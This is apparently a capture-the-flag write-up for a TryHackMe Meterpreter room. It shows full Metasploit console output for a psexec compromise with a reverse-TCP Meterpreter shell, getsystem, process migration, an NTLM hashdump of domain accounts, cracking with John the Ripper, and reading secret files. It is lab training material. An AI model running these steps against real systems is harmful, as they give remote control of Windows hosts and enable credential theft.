Home Metasploit - Meterpreter
Post
Cancel

Metasploit - Meterpreter

THM Room https://tryhackme.com/room/meterpreter

TASK 1 : Introduction to Meterpreter

No answer needed

No Answer

TASK 2 : Meterpreter Flavors

No answer needed

No Answer

TASK 3 : Meterpreter Commands

No answer needed

No Answer

TASK 4 : Post-Exploitation with Meterpreter

No answer needed

No Answer

TASK 5 : Post-Exploitation Challenge

The questions below will help you have a better understanding of how Meterpreter can be used in post-exploitation. You can use the credentials below to simulate an initial compromise over SMB (Server Message Block) (using exploit/windows/smb/psexec)

UsernamePassword
ballenPassword1

What is the computer name ?

Using given information, i searched a module for SMB exploitation :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
msf5 auxiliary(scanner/smb/smb_login) > search smb

Matching Modules
================

   #    Name                                                            Disclosure Date  Rank       Check  Description
   -    ----                                                            ---------------  ----       -----  -----------
   0    auxiliary/admin/mssql/mssql_enum_domain_accounts                                 normal     No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
[...]
  108  exploit/windows/smb/psexec                                      1999-01-01       manual     No     Microsoft Windows Authenticated User Code Execution

msf5 auxiliary(scanner/smb/smb_login) > use 108
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > setg RHOSTS 10.10.99.129
msf5 exploit(windows/smb/psexec) > setg SMBPass Password1
msf5 exploit(windows/smb/psexec) > setg SMBUser ballen
msf5 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.10.99.128     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               Password1        no        The password for the specified username
   SMBUser               ballen           no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.196.135    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.10.196.135:4444 
[*] 10.10.99.128:445 - Connecting to the server...
[*] 10.10.99.128:445 - Authenticating to 10.10.99.128:445 as user 'ballen'...
[*] 10.10.99.128:445 - Selecting PowerShell target
[*] 10.10.99.128:445 - Executing the payload...
[+] 10.10.99.128:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (176195 bytes) to 10.10.99.128
[*] Meterpreter session 1 opened (10.10.196.135:4444 -> 10.10.99.128:54360) at 2021-09-26 12:30:45 +0100

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : ACME-TEST
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : FLASH
Logged On Users : 7
Meterpreter     : x86/windows

Answer : ACME-TEST

What is the target domain ?

The sysinfo command above give us the domain too !

Answer : FLASH

What is the name of the share likely created by the user ?

Background the actual meterpreter the search for a new mode for SMB share enumeration :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
msf5 exploit(windows/smb/psexec) > sessions

Active sessions
===============

  Id  Name  Type                     Information                      Connection
  --  ----  ----                     -----------                      ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ ACME-TEST  10.10.196.135:4444 -> 10.10.99.128:54360 (10.10.99.128)


msf5 exploit(windows/smb/psexec) > search scanner/share
[-] No results from search
msf5 exploit(windows/smb/psexec) > search scanner_share
[-] No results from search
msf5 exploit(windows/smb/psexec) > search enum/share
[-] No results from search
msf5 exploit(windows/smb/psexec) > search enum_share

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  post/windows/gather/enum_shares                   normal  No     Windows Gather SMB Share Enumeration via Registry


msf5 exploit(windows/smb/psexec) > use 0
msf5 post(windows/gather/enum_shares) > run

[*] Running against session 1
[*] The following shares were found:
[*] 	Name: SYSVOL
[*] 
[*] 	Name: NETLOGON
[*] 
[*] 	Name: speedster
[*] 
[*] Post module execution completed

Answer : speedster

What is the NTLM hash of the jchambers user ?

Meterpreter accept the hashdump command directly, so let’s try !

1
2
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Ok, let’s check what’s or process and migrate to another proccess.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
meterpreter > ps

Process List
============

 PID   PPID  Name                                       Arch  Session  User                          Path
 ---   ----  ----                                       ----  -------  ----                          ----
 0     0     [System Process]                                                                        
 4     0     System                                     x64   0                                      
 68    4     Registry                                   x64   0                                      
 400   4     smss.exe                                   x64   0                                      
 500   756   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 552   544   csrss.exe                                  x64   0                                      
 632   624   csrss.exe                                  x64   1                                      
 676   544   wininit.exe                                x64   0                                      
 692   624   winlogon.exe                               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 756   676   services.exe                               x64   0                                      
 772   676   lsass.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 780   692   dwm.exe                                    x64   1        Window Manager\DWM-1          C:\Windows\System32\dwm.exe
 836   756   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 880   756   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 948   756   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 992   756   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1136  756   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1144  756   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1152  756   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1212  756   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1332  756   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1400  756   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1420  756   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1712  756   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2100  692   LogonUI.exe                                x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 2212  692   fontdrvhost.exe                            x64   1        Font Driver Host\UMFD-1       C:\Windows\System32\fontdrvhost.exe
 2220  676   fontdrvhost.exe                            x64   0        Font Driver Host\UMFD-0       C:\Windows\System32\fontdrvhost.exe
 2256  756   spoolsv.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 2312  756   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2332  756   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2392  756   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2416  756   amazon-ssm-agent.exe                       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 2444  756   LiteAgent.exe                              x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\XenTools\LiteAgent.exe
 2476  756   ismserv.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\ismserv.exe
 2492  756   dfsrs.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfsrs.exe
 2504  756   Microsoft.ActiveDirectory.WebServices.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
 2516  756   dns.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dns.exe
 2532  756   dfssvc.exe                                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfssvc.exe
 2688  2412  powershell.exe                             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
 2948  756   vds.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 2972  2416  ssm-agent-worker.exe                       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\ssm-agent-worker.exe
 2980  2972  conhost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 3708  756   msdtc.exe                                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 4060  2688  conhost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe

meterpreter > getpid
Current pid: 2688
meterpreter > migrate 2256
[*] Migrating from 2688 to 2256...
[*] Migration completed successfully.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:cad1611a69ea0142dfd6ee121338244a:::
meterpreter >

We are looking for the 4th part of the hash : 69596c7aa1e8daee17f8e78870e25a5c.

Answer : 69596c7aa1e8daee17f8e78870e25a5c

What is the cleartext password of the jchambers user?

We can use several tools to have the cleartext password of the NTLM hash. You can use online tools like crackstation or command line tools like John The Ripper or Hashcat.

Crasktation :

Crasktation Crasktation

With John The Ripper :

1
2
3
4
5
6
7
8
9
10
root@ip-10-10-196-135:~/Desktop/msmeterpreter# cat hash2.txt 
69596c7aa1e8daee17f8e78870e25a5c
root@ip-10-10-196-135:~/Desktop/msmeterpreter# john --format=NT --rules -w=/usr/share/wordlists/rockyou.txt hash2.txtUsing default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
Trustno1         (?)
1g 0:00:00:01 DONE (2021-09-26 13:58) 0.9090g/s 46778p/s 46778c/s 46778C/s blackrose1..2pac4ever
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed. 

Answer : Trustno1

Where is the “secrets.txt” file located?

1
2
3
4
5
meterpreter > search -f "secret*"
Found 2 results...
    c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt (35 bytes)
    c:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\secrets.txt.lnk (1045 bytes)
meterpreter >

Answer : c:\Program Files (x86)\Windows Multimedia Platform

What is the Twitter password revealed in the “secrets.txt” file?

Going to the location then print the file content :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
meterpreter > shell
Process 3408 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd c:\Program Files (x86)\Windows Multimedia Platform
cd c:\Program Files (x86)\Windows Multimedia Platform

c:\Program Files (x86)\Windows Multimedia Platform>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of c:\Program Files (x86)\Windows Multimedia Platform

07/30/2021  08:33 PM    <DIR>          .
07/30/2021  08:33 PM    <DIR>          ..
07/30/2021  07:44 AM                35 secrets.txt
09/15/2018  07:12 AM            40,432 sqmapi.dll
               2 File(s)         40,467 bytes
               2 Dir(s)  15,242,125,312 bytes free


c:\Program Files (x86)\Windows Multimedia Platform>type secrets.txt
type secrets.txt
My Twitter password is KDSvbsw3849!

Answer : KDSvbsw3849!

Where is the “realsecret.txt” file located?

1
2
3
meterpreter > search -f "*secret.txt*"
Found 1 result...
    c:\inetpub\wwwroot\realsecret.txt (34 bytes)

Answer : c:\inetpub\wwwroot

What is the real secret?

Going to the location and showing the file content :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
c:\Program Files (x86)\Windows Multimedia Platform>cd c:\inetpub\wwwroot
cd c:\inetpub\wwwroot

c:\inetpub\wwwroot>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of c:\inetpub\wwwroot

07/30/2021  08:32 PM    <DIR>          .
07/30/2021  08:32 PM    <DIR>          ..
07/30/2021  07:56 AM               729 iisstart.htm
07/30/2021  06:52 AM            99,710 iisstart.png
07/30/2021  08:30 AM                34 realsecret.txt
               3 File(s)        100,473 bytes
               2 Dir(s)  15,242,125,312 bytes free

c:\inetpub\wwwroot>type realsecret.txt
type realsecret.txt
The Flash is the fastest man alive
c:\inetpub\wwwroot>

Answer : The Flash is the fastest man alive

This post is licensed under CC BY 4.0 by the author.